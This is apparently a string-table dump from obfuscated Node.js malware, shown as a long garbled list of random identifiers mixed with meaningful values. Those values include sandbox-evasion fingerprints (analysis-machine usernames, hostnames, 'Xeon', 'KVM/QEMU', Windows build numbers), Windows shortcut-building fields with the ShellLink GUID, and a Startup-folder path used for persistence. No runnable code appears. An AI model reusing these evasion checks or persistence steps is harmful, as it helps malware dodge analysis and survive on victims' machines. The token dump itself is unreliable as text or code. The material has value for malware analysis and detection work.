NKjwR

3219

NKjwR

XEINT

FIttK

93a77b

FIttK

SRMVR

PhglB

KKfCr

EKAHi

eKXSR

ZkJbB

YIYXP

wGvpQ

nmcAD

pYeDm

win32

cTMwy

HuIta

CBGKP

DHwnu

c350

pmGQD

SRMVR

vBhfG

cTMwy

vBhfG

DOmTJ

32b1d5

HlsKH

JXvMi

win32

JXvMi

cTMwy

iRkfL

KSEwZ

JhdjQ

rUISh

KSEwZ

SRMVR

KSEwZ

cTMwy

KSEwZ

cVpAP

5fd4c0

cVpAP

SRMVR

XNaNP

KKfCr

hokvE

eKXSR

hokvE

fqBgV

xRJvy

ghVdc

xRJvy

SRMVR

xRJvy

hUAxz

CSDVC

dtmmE

QpkTX

yamYs

oFOwe

yamYs

SRMVR

dAenp

6.1.7601

gswkA

sEjlq

a888

sEjlq

379a7d

lTGKS

indexOf

gBlGN

sEjlq

SRMVR

GOMEI

10.0.22000

EWQdn

gdgTe

zwQac

9d5196

zwQac

win32

yMpge

KKfCr

lTGKS

indexOf

eNcny

zwQac

LCXYz

b624

fzHYK

wvxLo

VHTcX

4b33b6

gNxZR

SRMVR

yMpge

KKfCr

gNxZR

6.1.7601

gNxZR

Uiddg

xhEsy

Xjwwi

24889e

bZuPM

18126e

bot 115 W7 Xeon H 24889e U 18126e

hotDy

win32

yMpge

gtaWv

JzMtH

kZsgN

AUMqc

kGSOG

win32

yMpge

kGSOG

6.1.7600

MdjeW

Dqjbp

ThfeP

GHtnD

SRMVR

ThfeP

10.0.19041

ThfeP

JvRgN

KujTa

d76211

KujTa

SRMVR

gtaWv

yjRqq

10.0.19045

yjRqq

VGopq

OOEVw

win32

gtaWv

hFHBV

yuSQx

hFHBV

nPSGy

djBkT

UtxUF

win32

yMpge

gtaWv

6.1.7601

aCtoS

NCHCN

iLDUg

yQvBG

NCHCN

SRMVR

PgBkR

CkQri

qhGNQ

tyqTS

zYgrG

YtaTA

XurSo

YtaTA

win32

YtaTA

cTMwy

aXuAC

ugCDA

IYZLs

fFPlK

ugCDA

RChqH

SRMVR

ugCDA

cTMwy

ugCDA

PhxRk

xWeco

PhxRk

jVVzp

SRMVR

PhxRk

mlKVQ

BGXgH

436f

nsRAs

win32

bBYQw

cTMwy

bBYQw

Abjqd

e717

Abjqd

ZMAdk

oVDLL

win32

ZDEtR

gtaWv

oVDLL

JzMtH

ejctK

cvIXh

gwCpn

cvIXh

SRMVR

QBWGn

cvIXh

eKXSR

cvIXh

Xcjxf

ewpUM

gcZmo

SRMVR

wqDzM

cTMwy

lIrNd

tggxo

EVDAu

tggxo

rpPpk

FNyPD

rSJrf

TeEeo

win32

QBWGn

ucCXU

rclbs

yuSQx

rclbs

NjadO

471915

SRMVR

nFwQF

olfHU

DKBNk

rGNEn

DnRNZ

QWilB

uxqZV

SRMVR

uxqZV

yuSQx

uxqZV

HyKaV

RagMr

HyKaV

SRMVR

GxEAb

yvgFw

JzMtH

yvgFw

XUMqd

PjZpo

dyutv

d04f74

PjZpo

LcKBp

gRhij

win32

gRhij

6.1.7601

gRhij

MnbPt

XzyRC

LxVOV

dppXa

LxVOV

SRMVR

mSIrc

6.1.7601

oqluh

zBMms

iWCYE

ucCXU

nVZnI

UouuZ

nVZnI

5b2e9c

dInQC

RVjTW

SRMVR

yWotZ

ucCXU

JzMtH

RVjTW

SrgvB

xurxt

SrgvB

SRMVR

10.0.19045

fRuhf

EdDMy

lVBvv

ERlXF

vXXoC

SRMVR

vXXoC

6.1.7601

vXXoC

rukBR

VLnDA

rukBR

tDAPK

bb2e4c

rukBR

win32

yuSQx

rukBR

Meapi

WvtNV

HmDIp

yLKcd

PBpGn

MlMqu

SRMVR

TVofi

xtgwH

10.0.18362

xtgwH

afMHK

b71c

ocmjc

yCeJC

SRMVR

UaRLh

yuSQx

cidBU

b1a8

7db39b

cidBU

SRMVR

TVofi

ucCXU

cidBU

JzMtH

cidBU

XKTJV

WDksU

xGomH

yMCsY

jEvms

yMCsY

NjmGU

win32

OaSNf

ucCXU

yeVXD

yuSQx

Dhrxq

wMskn

nYojy

DsERm

PJkIF

Skpyj

SRMVR

OaSNf

PJkIF

juuLK

PJkIF

ySrRP

Auhrg

hqTNM

ResZa

KuGIt

SRMVR

KuGIt

olfHU

KuGIt

RfYMy

AxlTP

lJkwu

pACLV

lJkwu

win32

uDKfQ

10.0.22621

uDKfQ

kLVfy

AcvHx

RkfLV

EMUbs

AcvHx

SRMVR

eKXSR

AcvHx

IYZLs

PnadJ

tgcMA

PnadJ

LAYLm

rmXMu

SRMVR

OaSNf

ucCXU

wamTX

JzMtH

GSoIK

MKnsY

dhLIz

MKnsY

Mxnka

vWplG

f2886f

NsDiD

SRMVR

xNaxO

MDEAi

NKreF

vtZBo

13b4

AXgQM

hSyDc

AXgQM

IWIFj

gllHp

SRMVR

gllHp

yuSQx

gllHp

MAPWL

MUDgX

QFtMh

747890

win32

OaSNf

ucCXU

QFtMh

JzMtH

rMkzk

ayTjj

QnStH

wHuXj

QnStH

lXUOW

wqXrC

fdXIn

SRMVR

DzdTP

LbrtS

DzdTP

iqbtK

kbMVe

iqbtK

8215e4

ECcDg

SRMVR

JSRSL

ECcDg

JzMtH

ECcDg

SPnDR

ECRIm

eFOcT

ECRIm

afufX

ECRIm

win32

GuxLA

yuSQx

GuxLA

SVxDu

XuxxW

QWfdb

JSRSL

tMGeZ

lXiRU

SRMVR

kwPPA

JzMtH

kwPPA

mbXUS

f5faf7

VjUDl

mbXUS

SRMVR

OaSNf

JSRSL

yuSQx

mbXUS

bf0760

ZHNxw

DBzOx

YlbyZ

SRMVR

YlbyZ

10.0.22621

OJMYI

db9a51

OJMYI

FrPLM

Whrex

win32

DukqA

yuSQx

DukqA

IjZxb

yGegB

roZyV

SRMVR

olfHU

yGegB

OItZO

62327b

OItZO

HWLWt

MOyse

SRMVR

DATUz

VQyWB

MOyse

d61484

MOyse

JPGzu

MOyse

win32

cNeRI

KxfMU

LbrtS

dfziL

KxfMU

QMmLB

kAIIV

SRMVR

DATUz

xUkeO

LRyxf

kAIIV

UwTaf

kAIIV

PEivQ

SRMVR

bXAPy

6.3.9600

JjiEq

olZzP

JjiEq

SRMVR

DATUz

QCBJP

XueEB

JzMtH

XueEB

2048

XueEB

16a7c1

XueEB

hjiEK

UI32LE

UI32BE

UI16BE

UI8

hex

GUID

UI16LE

HEX

DTSTP

LuPwl

ECRbM

rImfI

GvozR

alloc

writeUInt32LE

ivyUB

alloc

writeUInt32BE

UI16LE

alloc

writeUInt16LE

biAwS

alloc

writeUInt16BE

vDktu

alloc

writeUInt8

HEX

from

jUEDd

xNKDO

split

gHXnL

GvozR

gHXnL

UI16LE

gsBJW

xrSKF

XQTwS

ogYNw

selos

xrSKF

selos

concat

FTIME

zOTYC

eLSxI

Lgzch

jDydb

floor

FLJnb

floor

FLJnb

xrSKF

GvozR

xrSKF

UI32LE

concat

jDSeK

lmVXB

FWUSP

Lgzch

getFullYear

FWUSP

pmyAU

getMonth

lmVXB

getDate

ziajb

XQTwS

fhwff

llQxA

getHours

WTuTG

getMinutes

floor

gxDlJ

getSeconds

ALNLB

XQTwS

concat

STR16

alloc

length

KKETi

length

writeUInt16LE

charCodeAt

jDydb

DHpFs

undefined

TeItd

nftcb

mYAHN

writeFileSync

push

cPnkn

rImfI

RTIPi

2|1|0|4|3|5

\.\

HvpHG

split

uOmhL

substr

length

substr

FyHVe

length

MJhpf

indexOf

aKdbw

split

aKdbw

join

MJhpf

indexOf

split

join

uOmhL

length

uOmhL

substr

UI16LE

STR16

x64

\Fonts\micross.ttf

hex

Washington1

Microsoft Root

test

3|7|6|8|0|4|5|9|2|1

computername

username

C:\

rpcsrv

tmpbuild

LU0TO

_i_

object

YVYZP

CPzoU

zuqHK

KxxIJ

YKqXV

min

UI32LE

00021401-0000-0000-c000-000000000046

FTIME

UI8

GUID

hOHux

BxqkX

DTSTP

fDVmD

xlWIR

LBiLi

RebQJ

ekxuJ

xGWKs

kznoj

SBvSj

PmXEE

FsQzq

ydyEc

length

pQtWh

uAvdR

name

length

name

file

length

file

workdir

length

workdir

args

length

args

icon

length

icon

now

workdir

knuCM

Njmom

ibftY

workdir

bgyet

workdir

indexOf

JnTOL

workdir

floor

hJxWS

pop

file

LHFqE

cSaox

GFzLu

file

indexOf

JnTOL

tQOHl

JnTOL

xNwom

deWdX

file

vWmaJ

aERKY

length

UzHmC

pcntP

file

LHFqE

XulRA

grWGQ

writeFileSync

pf1

readFileSync

file

bgyet

split

flg

HpdqN

flg

name

flg

rPGlF

file

flg

workdir

flg

pRXML

args

flg

pRXML

icon

flg

att

file

JnTOL

gmMlc

outerr

push

att

JnTOL

AbwoN

tOfbC

att

shcm

SjyxJ

show

max

shcm

SjyxJ

show

CbeTO

xGHoA

show

shcm

ZCjti

sQVlc

GUID

BlBPW

sQVlc

UI32LE

flg

sQVlc

ZCjti

att

sQVlc

yBgia

ftc

tGnWh

FTIME

fta

fhfVt

yBgia

ftw

fhfVt

ZCjti

fsz

ZCjti

icidx

fhfVt

ZCjti

shcm

fhfVt

aERKY

hky

bRzBo

aERKY

CSOFY

ZCjti

concat

VmgyY

flg

lZYGc

DZyzH

UI16LE

lTAcx

aERKY

lTAcx

pGrRe

qtDTN

Zwtkv

20d04fe0-3aea-1069-a2d8-08002b30309d

length

substr

xGHoA

KjBJa

qtDTN

aERKY

qtDTN

UI8

push

from

exPsp

CQUic

pGrRe

push

alloc

error

QIFMD

length

UVDdV

JbHuG

length

from

file

SjyxJ

pHLWw

length

tRlYd

UI16LE

exPsp

length

pGrRe

qMiRr

ZCjti

qMiRr

DTSTP

ftw

fQSKs

aERKY

push

fQSKs

pGrRe

rHtkV

aERKY

BEjKk

aERKY

BEjKk

ZCjti

BEjKk

DTSTP

ftc

AkRHY

xkTxt

fta

length

AkRHY

aERKY

EdrPs

length

AkRHY

aERKY

AkRHY

pcntP

UI16LE

AkRHY

UI16LE

concat

writeUInt16LE

length

push

concat

writeUInt16LE

length

push

fYMJi

SFbZN

readFileSync

length

dcosv

length

toString

Zeaqh

from

ZMesM

toString

hex

wTIGW

indexOf

from

dGQvs

toString

Zeaqh

jbmCk

indexOf

COMFg

aERKY

log

pEcSi

writeFileSync

trim

exit

concat

length

writeUInt16LE

pHLWw

length

sInfv

flg

JnTOL

bEtVR

fDVmD

Quad

name

mFUia

aERKY

length

gftxI

STR16

flg

JnTOL

JtWLy

wMJTe

file

AkLDN

aERKY

length

AkLDN

STR16

deBgD

split

prototype

slice

call

qUzbe

dcosv

push

deWdX

pQvpi

vhGqc

xEbDU

deWdX

userdomain

CmWPK

mbcfr

concat

fqnzX

sInfv

flg

JnTOL

vfQCd

BoWIr

LwuLr

workdir

fqnzX

length

MZnwa

aERKY

length

MZnwa

pcntP

cJjHF

SnMJD

sInfv

flg

xGHoA

CNpGI

ZSOdH

name

aERKY

length

UzHmC

pcntP

args

trim

qSeGZ

aERKY

length

qSeGZ

pcntP

SnMJD

GLOKs

flg

xGHoA

JQDgI

RrxPm

dDlGn

fromCharCode

NkLoO

VmgyY

mSWdy

icon

xbxFr

aERKY

length

xbxFr

pcntP

length

yVXcP

UI32LE

concat

JnTOL

HjddJ

xQzpz

writeFileSync

QkLkC

BWvyX

yePSj

ySGse

NImqg

CtcZW

OWvEG

TxcbQ

YlDfT

UXoFA

.txt

readFileSync

toString

trim

.exe

\Microsoft\Windows\Start Menu\Programs\Startup\

.lnk

JiUgk

VbbaM

Ryuue

VbbaM

yZyTM

aup

qNlKm

TBnQu

qNlKm

XIsNT

tmp

OHipI

jTURN

MEPyi

acirL

CuiPP

hLkDK

jTURN

hLkDK

apd

HZfvh

pTIsr

qVCeP

uZNNx

mkdirSync

34|25|120|129|149|86|145|165|60|164|159|100|144|170|117|121|22|66|156|14|111|18|70|35|64|21|5|106|179|33|131|126|77|95|130|114|186|39|122|133|113|97|92|75|40|178|11|50|87|176|28|41|167|46|51|134|69|141|53|153|78|99|115|175|89|55|169|103|155|123|36|110|3|81|184|105|93|127|140|38|47|151|147|162|189|17...

win32

10.0.17763

299243

6.1.7601

b71c

2bf408

harry johnson

d61484

d0062c

10.0.19044

4f5cec

10.0.19045

bf0760

10.0.22621

2cd67e

c23200

56d4

d33e1f

9ec750

cb0013

5bc06f

6.3.9600

c8b63d

7b7bc2

Xeon

Host1

user

10.0.15063

admin

709b

64ccb5

2be941

f94649

DESKTOP

bf7e

d8716f

04159b

2970

8e776c

e717

033bd9

bea-chi

john doe

e2c5

f4cb33

72f6c0

art-pc

administrator

10.0.18362

NOHID

990d1b

582a34

10.0.17134

NOUID

10.0

9639a3

dillon

peter wilson

10.0.19041

10.0.19043

436f

10.0.22000

a98d

efba14

930d8a

2a4494

a4757d

10.0.18363

badfad

f1dd

10.0.10240

6.1.

1e75

janusz-

f6b8ae

8fdf0b

a.monaldo

9d5196

32b5

9f9d51

56aee3

2b22

74529b

6.1.7600

a592e8

0b6631

97a9d3

fb6ab4

a888

2001f7

my_pc_

AMD EPYC

7e73

ed6464

72e748

e06b

6a29b3

4085c6

804a

frank

3e45fc

46e6f8

work

2652ee

d76211

86438b

e8b9

fca565

f2886f

52acd9

167bfe

275dec

351468

5803c5

3322

bca236

723943

9ca5a0

7aed

b445bf

cc9adb

KVM/QEMU

7e0c8b

e379b3

72c1f0

100

3151

101

b7e24d

b6f4a2

102

471915

103

5a1d

6adf97

104

7c1a

591acb

105

10.0.14393

107

3a83fe

d38e35

108

16a7c1

39549c

109

73a080

11d4d6

112

7f8794

113

1285

b3c775

114

46502a

115

116

f3f0c6

117

alexeyzolotov

6e64

121

122

8920

123

5d0c

bc54f4

124

851c

061613

10.0.16299

13b4

126

953225

john

128

9a50

130

131

52c9

132

9a8599

133

0fdc

cc1a

88dba0

134

shadow-

shadow

135

136

137

24889e

18126e

bot 115 W7 Xeon H 24889e U 18126e

138

139

25cd40

141

10.0.

03fea1

4b33b6

143

5b2e9c

144

10.0.10586

a8776a

e94c92

9ab4de

145

e1e853

146

b1a8

7db39b

3635

1cce9e

6bd1

d864df

bb2e4c

149

150

2253

2293

e8c630

3f9b99

151

bd9ff1

joe smith

154

c037

155

156

anna-

26112

158

379a7d

159

160

3219

9db1e4

161

162

163

azure-

165

570a90

166

32b1d5

167

168

169

gary-pc

stark

170

171

5fd4c0

a739

75c891

173

092f16

48fdf5

174

dd15

175

DESKTOP-JTAPJCC

77bd

177

8726e3

cd4ec1

179

mars-pc

180

181

a30c

6eb45e

182

6cfdbc

b38e56

183

185

95deb5

4f81e3

b75705

187

62efb9

188

189

835669

190

0bd650

6|3|15|0|11|14|7|2|1|13|8|9|12|10|5|4

string

false

C:\

prsv

HfRpI

EIpKA

DMKWn

uLqHQ

wqmiT

KhPcR

dffSs

peQIH

cYiTM

aCnWn

RBOqw

log

mIsdU

pf1

pf2

TSkfY

wpPlA

HfRpI

mkdirSync

isc

existsSync

resolve

argv

resolve

argv

TSkfY

EIpKA

FROXT

statSync

pf1

SLoSD

split

wafoa

LYcAl

TPIcK

GBlBu

Rdgwu

Kohwu

zVgcD

TanuB

d1457b

LYcAl

gFwPL

TanuB

ubcMM

TanuB

ROiut

adzev

JKWvB

win32

WWgwz

gFwPL

DWafV

ubcMM

DWafV

86131a

DWafV

win32

WWgwz

QgCQX

DWafV

6.1.7601

DWafV

11d4d6

rZmhj

indexOf

administrator

DWafV

LYcAl

WWgwz

QgCQX

ubcMM

loxgW

ExBwd

mVAjG

rulZz

d04f74

rulZz

doith

rulZz

LYcAl

indexOf

AMAZING-AVOCADO

RHGLJ

indexOf

dtJPH

MVXop

LYcAl

WWgwz

QgCQX

MVXop

aniKD

jzQdx

hlsxI

SZiMj

LYcAl

WVMFi

QgCQX

XcLmL

AZAkO

hXlfH

AEDcU

HLEpm

AEDcU

LYcAl

wUnoy

gxjPr

PTLCN

AEDcU

jVGGC

qOuag

uiGmx

qOuag

9114

qOuag

LYcAl

cXhMn

qOuag

qfuEl

qOuag

UUirb

yZCnh

LYcAl

UUirb

FHhEZ

769fc7

UUirb

win32

cXhMn

gxjPr

ubcMM

JgHks

gHDRc

eainW

SUcjU

LNmRo

cqJEE

mLypN

LYcAl

ScNoL

ykKif

vEesc

IOeXS

LYtNI

LYcAl

SOoay

LVCsq

OHsvg

bvnIp

DmFQw

JfVIp

win32

uAEsb

gxjPr

indexOf

TKtSZ

RHGLJ

indexOf

ZdQzl

tdnDp

indexOf

WJiRC

DmFQw

LYcAl

uAEsb

gxjPr

ubcMM

OwyqM

JzIgH

PYjGl

win32

uAEsb

gxjPr

uAEsb

indexOf

TKtSZ

XNMaB

ubcMM

FAQhP

vKSwt

c589

vKSwt

611a3e

fFRjr

indexOf

administrator

lIwtL

LYcAl

uAEsb

6.1.7601

CJOmZ

PuBSN

EOPnZ

exsbv

XIjwe

cudKi

indexOf

NOHID

dfntD

indexOf

swTzr

XIjwe

kFkvA

FmxcA

LYcAl

mbYJh

xxfVl

vkpjy

zneaG

PTLCN

indexOf

TKtSZ

LYcAl

vkpjy

6.1.7601

vkpjy

f5faf7

uJNeu

vkpjy

LYcAl

uAEsb

lNKmQ

6.1.7601

bYnVG

dfntD

indexOf

fYSZv

naJbE

indexOf

swTzr

bYnVG

LYcAl

ejLcG

AQpoX

ubcMM

uYnUm

dXLzz

GDxFd

indexOf

TKtSZ

rqWza

a65640

zIfnV

IOeXS

mzMlZ

LYcAl

AQpoX

mzMlZ

XcLmL

mzMlZ

iKPzJ

OlKMz

iKPzJ

35ae2e

SqTkT

TZEHF

SqTkT

LYcAl

GDxFd

xnvbv

wJZgx

6.3.9600

wJZgx

ydaoz

jnvjc

cHbDi

jnvjc

win32

OYPNp

BAzxC

rxjvH

EOPnZ

SefZy

XrwPo

SefZy

dbTTV

SefZy

win32

qfuEl

SefZy

rYJmt

SefZy

646a8b

zPwzT

win32

wZKuy

aFEyM

XcLmL

gAcyp

fOseZ

tpOsy

DCaSH

KPCjM

DCaSH

LYcAl

wZKuy

BAzxC

indexOf

LcTTp

naJbE

indexOf

qRYsb

DCaSH

win32

PTLCN

QcpHD

TmlHK

scivu

12a5b6

rdaWW

SaLSc

TmlHK

GQJxe

LYcAl

ACGfv

MSfis

XcLmL

OXatv

OUWhk

vQKXE

LTgUV

LYcAl

JgQtp

PTLCN

HZeFZ

rjKIO

zlDJg

girgn

LYcAl

ubcMM

zlDJg

JfqlE

TDUHe

indexOf

TKtSZ

LYcAl

ACGfv

KxWEe

ubcMM

naJbE

indexOf

lDkJV

naJbE

indexOf

sSBRg

isArray

VDbJu

length

KxWEe

LYcAl

ACGfv

dEtOa

CeBGU

indexOf

fYSZv

RvIAD

indexOf

swTzr

oGBck

RjpDf

wRYVw

JFWEh

indexOf

TKtSZ

uMfuI

win32

LDDhC

HNuXb

wUCqh

611a3e

TsRyq

ubcMM

TsRyq

LDDhC

indexOf

TKtSZ

LCCoG

indexOf

aZxDi

LCCoG

indexOf

sSBRg

LYcAl

PTLCN

qOacw

qTgjb

BZNiH

UuYwY

ajALe

UuYwY

LYcAl

LDDhC

UuYwY

rJKwG

CeCjW

rJKwG

10.0.18362

KkRtL

2088

UWZEr

indexOf

fYSZv

UWZEr

indexOf

zgdgD

tWnTa

LYcAl

LDDhC

HNuXb

indexOf

InILP

tWnTa

LgwXo

indexOf

Xeon

tWnTa

EOPnZ

50ab44

oiXIk

OGyZm

LYcAl

qsqUz

indexOf

vOuTg

BsAgB

indexOf

zgCBr

oiXIk

LYcAl

oiXIk

hSrGm

RaBuf

DLgmS

2a4494

LYcAl

dAaPt

AbICd

YFVzD

LILiI

VQcso

nnXyq

mPvTZ

LYcAl

yIOAD

GIbXF

gtEbv

fZYig

gtEbv

PUzkU

lApth

LYcAl

qsqUz

HNuXb

6.1.7601

FuxQO

RzZmR

Tlzop

41c07c

qXdhb

LYcAl

HvJAt

10.0.19045

uuhmQ

iwVHs

c39efd

iwVHs

LYcAl

iwVHs

fUkZb

qfuEl

fUkZb

KkKjM

YMrxK

LYcAl

HNuXb

XxcIK

rWUAH

CeCjW

wRYVw

rWUAH

2088

BsAgB

indexOf

fYSZv

BsAgB

indexOf

NOUID

AFUvo

LYcAl

AFUvo

GBlBu

ViDeM

YZpbt

62327b

JuBJs

win32

IlFWw

SKYJq

IlFWw

BqdgS

7f8794

BqdgS

LYcAl

UTBqa

nOWNe

BIuOX

indexOf

10.0

kiVOl

vLyNW

deEXk

HSMcX

indexOf

swTzr

lrrCA

LYcAl

lrrCA

GIbXF

HSMcX

indexOf

fYSZv

lrrCA

tlLNf

lrrCA

LYcAl

UTBqa

nOWNe

PPrrY

indexOf

DESKTOP

JzLqG

zoezH

ZsPJB

LYcAl

rNEoZ

indexOf

fUyiw

zSNmP

indexOf

STRAZNJICA.GRUBUTT

ZsPJB

win32

ZsPJB

10.0.17763

ZsPJB

10.0.19044

ZsPJB

Qhkjm

sxgcy

zSNmP

indexOf

fYSZv

sxgcy

zCVkU

BGwYJ

LYcAl

rNEoZ

UczaO

indexOf

dANnZ

UczaO

indexOf

janusz

pzgQN

LYcAl

gnRUM

eJcMK

indexOf

Xeon

KamwT

10.0.19044

KamwT

ZbboF

indexOf

aZxDi

eCCBP

indexOf

swTzr

ZbboF

LYcAl

ubcMM

ZbboF

SsiSi

RkQzY

zCqHL

RTLsz

LYcAl

10.0.22621

eQhbi

ThbLk

idSYC

db9a51

idSYC

64ca98

LYcAl

eJcMK

FXLGX

ubcMM

CRdgp

kFkvA

zFvwy

qSeVi

ncOvY

win32

OrgrG

indexOf

xhvYN

IiuFl

ubcMM

pvXJM

gnRUM

indexOf

Xeon

pvXJM

LYcAl

CSkir

GIbXF

JxLUF

xcKUN

NwRqL

zWwDe

NwRqL

LYcAl

aoCvi

PTLCN

mkmON

VQrku

VXiff

mpdYB

kPEZf

mpdYB

kRZPW

zuIIc

LYcAl

CshsY

OrgrG

cVxZU

PTLCN

cVxZU

mpLLP

wVABx

LYcAl

ubcMM

wVABx

DPsnP

mVAjG

SYGNt

cd4ee8

bac5dd

vYUGY

7fa24d

vYUGY

nyqwA

egJAo

TyRtq

egJAo

4b418f

egJAo

Fjqsu

vveVx

LYcAl

CshsY

ZwfPH

vveVx

oSzjB

GkkeG

zgATS

atdAk

zgATS

UDbLg

PmSkt

LYcAl

oSigL

indexOf

anna-

kcVLc

sSClf

win32

10.0.19042

esOnO

LIvum

voHZU

LYcAl

CshsY

QmIYm

buomr

ubcMM

jFcpX

QJxmL

jISnO

gGKft

jISnO

FyNVq

eCCBP

indexOf

sSBRg

blIPV

LYcAl

CshsY

cxrAf

eCCBP

indexOf

fUyiw

eCCBP

indexOf

MPuGR

indexOf

sSBRg

dmOfu

win32

ltQHC

ERnfQ

ZnTGO

indexOf

InILP

fwncc

ltQHC

indexOf

TKtSZ

ltQHC

indexOf

APEbL

fwncc

JzLqG

wGnTi

10.0.19044

ZnTGO

indexOf

aZxDi

nWszC

gGKft

nWszC

zWlXD

OzQOS

70b4

qAjsJ

d580

bmHbu

indexOf

sSBRg

qAjsJ

win32

bwSBX

XcLmL

dzNLV

jwlMT

LYcAl

dzNLV

LVCsq

KqAqX

VoBGW

KqAqX

LYcAl

DwXxC

KqAqX

XcLmL

fcRKt

gOLiS

fcRKt

JYVij

fcRKt

LYcAl

fcRKt

PTLCN

AZXPR

xtCHf

gjCtD

xHzyR

rPCUp

LYcAl

ltQHC

rKKda

indexOf

10.0

SKYJq

rPCUp

MdSqH

rPCUp

AfriE

indexOf

fYSZv

xpcqF

indexOf

PdzWs

rPCUp

LYcAl

rPCUp

SKYJq

MAExa

UNqjb

rPCUp

LYcAl

ltQHC

agnxY

ltQHC

indexOf

KVM/QEMU

wxNEZ

JZNLr

LYcAl

xpcqF

indexOf

fUyiw

indexOf

ROKAd

QEAMX

indexOf

swTzr

JZNLr

LYcAl

ltQHC

wLNCx

JZNLr

6.1.7601

JZNLr

4ed984

DICnF

dvlJy

DICnF

LYcAl

DICnF

RaBuf

YoWbp

fRNPW

LkYSt

soUsb

evSTo

LYcAl

ltQHC

JQuvw

ubcMM

FiEqy

GdNBd

XGITv

QEAMX

indexOf

admin

win32

GdNBd

10.0.17763

10.0.19044

uoZYq

oeueP

indexOf

fYSZv

oeueP

LYcAl

ltQHC

wLNCx

oeueP

ubcMM

MEZoZ

pxwmO

IbCzg

abvdQ

GJsNm

HRhcj

oSLXP

LYcAl

xSsww

10.0.19045

asuCL

pQutV

LYcAl

asuCL

qfuEl

gEHME

lyAhO

OqeEN

OKFzh

OqeEN

d6a5b0

OqeEN

LYcAl

fpqZK

AqkjM

OqeEN

GVnrX

qXWxF

OqeEN

win32

fpqZK

indexOf

10.0

OqeEN

LWiYf

deEXk

HGWDA

indexOf

swTzr

LWiYf

win32

fpqZK

AqkjM

LWiYf

EOPnZ

xNLXT

bHQfm

MYeJo

LYcAl

indexOf

DESKTOP-JTAPJCC

bHQfm

LYcAl

qfuEl

PqBSR

ytykJ

huyUd

ytykJ

SqNnw

dELVa

CmdPI

LYcAl

fpqZK

badyQ

ubcMM

mmDkZ

VTyjo

OmSfD

pjTpP

LYcAl

AqkjM

fzZgj

indexOf

10.0

pjTpP

6f2958

indexOf

john

pjTpP

LYcAl

fpqZK

AqkjM

pjTpP

ubcMM

etKmA

FWgOc

etKmA

bwtbE

indexOf

lisa

win32

RuNbx

SKYJq

EBxla

qHVya

Tlpjq

qHVya

LYcAl

fpqZK

AqkjM

fpqZK

indexOf

occcE

qHVya

LErmX

LHYMi

LYcAl

LHYMi

qfuEl

VxQOe

tzoPB

KIsUM

7b7cd2

KIsUM

LYcAl

AqkjM

ubcMM

KIsUM

YzyHQ

fqqhm

indexOf

Xeon

YzyHQ

QJupa

LPgAw

eakhR

win32

AhtPH

PTLCN

wuIMX

mGsxX

WSomW

girgn

WSomW

LYcAl

indexOf

InILP

KyaxT

UWbtt

indexOf

george

MCfSo

BVVOV

LYcAl

BVVOV

iTjkY

10.0.10586

iTjkY

ubcMM

wGOdI

mtxZv

KvghS

indexOf

aZxDi

pOpPW

indexOf

zgdgD

wnKbJ

dBfHx

win32

dBfHx

PTLCN

YLAfo

jCtEG

SlBsw

CzOfU

fVXXn

LYcAl

fqqhm

AqkjM

SlBsw

PTLCN

SlBsw

IxHUN

zvSZo

ftako

ltqLZ

win32

yBYdM

wHFGz

FPNSd

ubcMM

FPNSd

mQsbX

POxDl

indexOf

sSBRg

SRBLD

mQsbX

sFAVB

HPFMa

LYcAl

XcLmL

QIuoX

YrEkE

eSOln

YrEkE

4b9de2

YrEkE

rqFwr

VSMsb

YrEkE

win32

WQRrO

XekYV

Jhjzq

IdHRu

OCHhc

UqyOR

indexOf

fYSZv

indexOf

swTzr

106

LYcAl

ysPgM

WQRrO

utRvB

AbICd

indexOf

dtJPH

JKNoK

LYcAl

utRvB

qfuEl

utRvB

WBkfR

utRvB

hRJuE

mKbym

utRvB

win32

ysPgM

FUvEJ

FQJbQ

6.1.7601

NDEjm

2048

NDEjm

uWFuI

MiaCE

fSrbT

wfFgM

oIxZs

LYcAl

MqgqD

FUvEJ

fSrbT

ubcMM

qEvJZ

AaSjH

b5a0

AaSjH

ruXeX

bUqTm

110

win32

FUvEJ

GHjAf

6.1.7601

fWRaY

bRKAu

indexOf

administrator

111

fWRaY

LYcAl

TUyyk

bfgjT

fIvCc

indexOf

TKtSZ

UqyOR

indexOf

Host1

UqyOR

indexOf

WJiRC

xNGiB

vbXtu

LYcAl

QBrtz

SKYJq

QBrtz

enwmP

QBrtz

dGnaH

aff8

fjxea

LYcAl

pEJhN

indexOf

10.0

bZVfr

jyXWW

zWdnV

nOBdJ

abcf10

jVGKX

gPIwd

nooEo

win32

fIvCc

bfgjT

IbUMg

ubcMM

YfyYh

TyGCt

WxGuz

indexOf

sSBRg

urWmq

rWanO

win32

RfGgw

HFTmU

indexOf

6.1.

HFTmU

indexOf

goatuser

aVzkg

LYcAl

jpAmj

KPbvJ

NolDx

ubcMM

rRTvh

yUjDd

CFbdn

7bf5

DOizz

2cb5a5

DOizz

zLQsi

bUJZF

BjPAz

win32

HFTmU

indexOf

CompAlexey

zScuF

indexOf

oaXfn

118

XZpbk

LYcAl

pvzZA

PTLCN

IzUiN

MQdYp

orTcV

MQdYp

typyO

747890

119

120

gngIH

win32

DfZEN

9a50

DfZEN

275dec

DfZEN

351468

fApet

aiper

LYcAl

indexOf

CompAlexey

WAuYR

indexOf

oaXfn

HLcOc

aiper

LYcAl

jpAmj

DXgCH

BsiSA

indexOf

InILP

BsiSA

indexOf

fYSZv

ytxhj

qfuEl

pCeCI

gBIgX

ejHcp

0cbc66

eaGkk

ejHcp

win32

Dngef

indexOf

InILP

indexOf

occcE

aMFoM

XoNFE

XcLmL

indexOf

fYSZv

aMFoM

jYnHT

mZJeO

taleT

LYcAl

xyuXn

lAxep

rkJGd

zEpcO

rkJGd

b0f8e1

NXTJF

QzqaA

125

NXTJF

win32

NXTJF

dtaCQ

MQPdx

rfeUH

MQPdx

ab86a1

HHdqr

dc599a

OOjip

win32

CWxWT

bxetw

HHdqr

6.1.7601

KgCfO

indexOf

athEb

127

nfpls

win32

nfpls

ubcMM

EteBW

bwtbE

Dngef

indexOf

lisa

xwuFO

xRSyw

win32

GnVpw

UhZkH

PTLCN

UhZkH

JocBE

JXbcj

129

EoVIT

LYcAl

GnVpw

bxetw

zFPmf

FfPGP

zFPmf

qXWxF

GDRAV

zFPmf

win32

GnVpw

indexOf

KVM/QEMU

jdFFU

CsbJA

YtLom

win32

jLRkm

bxetw

YtLom

ubcMM

PkFMx

PsMVa

indexOf

aZxDi

indexOf

zgdgD

xajXf

FumUj

gFiMu

LYcAl

jLRkm

bxetw

XcLmL

hCYan

leDkE

vSckw

fluGi

bbFyg

snPqE

fluGi

LYcAl

